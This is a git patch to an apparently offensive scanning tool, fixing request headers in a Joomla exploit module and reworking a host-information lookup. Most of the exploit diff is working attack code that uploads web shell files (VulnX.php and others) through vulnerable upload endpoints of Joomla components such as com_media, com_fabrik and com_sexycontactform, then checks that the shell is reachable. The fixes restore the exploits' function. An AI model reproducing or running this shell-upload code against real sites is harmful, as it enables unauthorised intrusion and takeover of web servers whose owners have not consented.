From c79e4c40e2ff1ec23f6f29753293c23f3cf02d7b Mon Sep 17 00:00:00 2001 From: Wiguna R <21243980+zombozo12@users.noreply.github.com> Date: Fri, 26 May 2023 00:22:02 +0000 Subject: [PATCH] Fix: issues #100 #85 and deleted domain age --- modules/exploits/joomla_exploits.py | 12 ++++++------ modules/gathering/host_gathering.py | 30 ++++++++++++----------------- 2 files changed, 18 insertions(+), 24 deletions(-) diff --git a/modules/exploits/joomla_exploits.py b/modules/exploits/joomla_exploits.py index c6dd46e..9acfbb8 100644 --- a/modules/exploits/joomla_exploits.py +++ b/modules/exploits/joomla_exploits.py @@ -45,7 +45,7 @@ def com_jce(self): def com_media(self): self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" - self.headers={"content-type":["form-data"]} + self.headers['Content-Type']="form-data" fieldname = 'Filedata[]' shell = open('shell/VulnX.txt','rb') data = { @@ -101,7 +101,7 @@ def com_media(self): #def com_jdownloadsb(self): # self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' # endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php" - # self.headers={"content-type":["form-data"]} + # self.headers['Content-Type']="form-data" # files = open('shell/VulnX.zip','rb') # shell = open('shell/VulnX.gif','rb') # data = { @@ -131,7 +131,7 @@ def com_fabrika(self): self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" - self.headers={"content-type":["form-data"]} + self.headers['Content-Type']="form-data" fieldname = 'file' shell = open('shell/VulnX.php','rb') data = { @@ -158,7 +158,7 @@ def com_fabrikb(self): self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" - self.headers={"content-type":["form-data"]} + self.headers['Content-Type']="form-data" fieldname = 'file' shell = open('shell/VulnX.txt','rb') data = { @@ -189,7 +189,7 @@ def com_foxcontact(self): # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" - self.headers={"content-type":["form-data"]} + self.headers['Content-Type']="form-data" fieldname = 'file' shell = open('shell/VulnX.txt','rb') data = { @@ -353,7 +353,7 @@ def com_sexycontactform(self): fieldname = "image[]" files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} data = { fieldname : files } - requests.post(endpoint, data=data, heades=self.headers,verify=False).text + requests.post(endpoint, data=data, headers=self.headers,verify=False).text shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X" checkShell = requests.get(shellup,headers=self.headers,verify=False).text statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) diff --git a/modules/gathering/host_gathering.py b/modules/gathering/host_gathering.py index 3092351..ae1698e 100644 --- a/modules/gathering/host_gathering.py +++ b/modules/gathering/host_gathering.py @@ -37,24 +37,18 @@ def os_server(self): print(' {0} Cannot Find the server headers ' .format(bad)) def web_host(self): - urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(self.url) - getinfo = requests.get(urldate, self.headers,verify=False).text - regex_date = r'Date: (.+?)-(.+?)' - regex_date = re.compile(regex_date) - matches = re.search(regex_date, getinfo) try: - if matches: - print(' {0} Domain Created on : {1}'.format(good, matches.group(1))) - ip = socket.gethostbyname(hostd(self.url)) - print(' {0} CloudFlare IP : {1}'.format(good, ip)) - ipinfo = "http://ipinfo.io/" + ip + "/json" - gather = requests.get(ipinfo, self.headers).text - - self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather)) - self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather)) - self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather)) - self.match_printer('Postal',self.match_info(r'postal\": \"(.+?)\"',gather)) - self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather)) - self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather)) + ip = socket.gethostbyname(hostd(self.url)) + print(' {0} CloudFlare IP : {1}'.format(good, ip)) + ipinfo = "http://ipinfo.io/" + ip + "/json" + gather = requests.get(ipinfo, self.headers).text + + self.match_printer('Hostname',self.match_info(r'hostname\": \"(.+?)\"',gather)) + self.match_printer('City',self.match_info(r'city\": \"(.+?)\"',gather)) + self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather)) + self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather)) + self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather)) + self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather)) + self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather)) except Exception as err: print(' {0} Parse Error : {1}' .format(bad,err)) \ No newline at end of file